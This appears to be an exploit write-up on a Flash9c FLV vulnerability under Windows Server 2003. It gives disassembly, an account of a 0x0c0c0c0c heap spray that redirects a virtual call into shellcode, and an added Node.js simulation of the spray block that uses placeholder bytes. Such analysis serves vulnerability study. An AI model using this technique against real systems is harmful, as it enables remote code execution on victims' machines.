Tested on Windows Server 2003 (Chinese), yunshu, www.ph4nt0m.org
3019CE18 C1E9 02 SHR ECX,2
3019CE1B 83E2 03 AND EDX,3
3019CE1E 83F9 08 CMP ECX,8
3019CE21 72 29 JB SHORT Flash9c.3019CE4C
3019CE23 F3:A5 REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI]
300ED77D 85C9 TEST ECX,ECX
300ED77F 0F84 00070000 JE Flash9c.300EDE85
300ED785 8B01 MOV EAX,DWORD PTR DS:[ECX]
300ED787 FF50 20 CALL DWORD PTR DS:[EAX+20]
When a heap spray is used, this will change ECX, so I let this JS script run the heap spray first.
All memory is allocated, then the FLV file is loaded, and ECX will be changed to 0c0c0c0c, which is written in 1.flv.
00000000-0c0c0c0c is filled with 0c0c0c0c and shellcode, so CALL DWORD PTR DS:[EAX+20] will call 0x0c0c0c0c, and
the content at 0x0c0c0c0c is 0c0c0c0c, then the shellcode runs.
^_^, maybe you should make some changes!
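As an added example (not part of yunshu's post, and not the JS spray script or the FLV it refers to): a small Node.js model of the 0x0c0c0c0c spray block and of the pointer chain the disassembly above follows, MOV EAX,[ECX] then CALL DWORD PTR [EAX+20]. It assumes a 1 MiB block size, a heap that is the same block repeated back to back from address 0 (real heaps interpose allocation headers, which is exactly why the sled and not the shellcode is the target), and a constructed 0xCC filler in place of shellcode.

```javascript
// Added example, not from the original post. Block size, the contiguous-heap
// model, the heap base and the filler "shellcode" are all assumptions.
const SLED_DWORD = 0x0c0c0c0c;
const BLOCK_SIZE = 0x100000;  // 1 MiB per sprayed block (assumed)
const HEAP_BASE = 0x00000000; // the post fills 00000000-0c0c0c0c; base 0 is a modelling assumption

// Constructed stand-in for shellcode: 64 bytes of INT3, not a real payload.
const FAKE_SHELLCODE = Buffer.alloc(64, 0xcc);

// Build one spray block the way a JScript spray does: a string whose UTF-16
// code units are 0x0c0c, so every DWORD of the sled reads 0x0c0c0c0c, with
// the shellcode appended at the end of the block.
function buildSprayBlock(shellcode, blockSize = BLOCK_SIZE) {
  if (shellcode.length % 2 !== 0 || blockSize % 2 !== 0) {
    throw new Error('block and shellcode sizes must be even (UTF-16 code units)');
  }
  const sledUnits = (blockSize - shellcode.length) / 2; // one code unit = 2 bytes
  const sled = Buffer.from('\u0c0c'.repeat(sledUnits), 'utf16le');
  return Buffer.concat([sled, shellcode]);
}

// Read a DWORD from the modelled heap: the same block repeated contiguously
// from heapBase (assumption; see lead-in).
function readDword(block, heapBase, addr) {
  if (addr < heapBase) throw new Error('address below the sprayed region');
  return block.readUInt32LE((addr - heapBase) % block.length);
}

// Follow the chain from the disassembly:
//   MOV EAX, DWORD PTR [ECX]      ; ECX = 0c0c0c0c, supplied by the FLV
//   CALL DWORD PTR [EAX+20]       ; vtable-style call through sprayed memory
// Returns the address the CALL transfers to.
function resolveCallTarget(block, heapBase, ecx) {
  const eax = readDword(block, heapBase, ecx);
  return readDword(block, heapBase, eax + 0x20);
}

// How many 0x0c bytes execution slides over before reaching the shellcode
// when EIP lands at `eip`. Each 0c 0c pair decodes as OR AL,0Ch, so the sled
// executes harmlessly whatever the entry alignment. Returns -1 if EIP lands
// inside the shellcode itself (not a clean entry).
function sledDistance(block, heapBase, eip, shellcodeLen) {
  const off = (eip - heapBase) % block.length;
  const sledEnd = block.length - shellcodeLen;
  return off >= sledEnd ? -1 : sledEnd - off;
}

// Stand-alone demonstration.
const block = buildSprayBlock(FAKE_SHELLCODE);
const target = resolveCallTarget(block, HEAP_BASE, SLED_DWORD);
console.log('CALL target: 0x' + target.toString(16));
console.log('sled bytes before shellcode: ' + sledDistance(block, HEAP_BASE, target, FAKE_SHELLCODE.length));
```

The model shows why 0x0c0c0c0c is a convenient choice: it is a valid address once the spray reaches it, every DWORD read through it yields 0x0c0c0c0c again (so EAX, [EAX+20] and the final EIP all stay inside the sled), and the bytes at that EIP execute as a NOP-like slide into the shellcode placed at the end of each block.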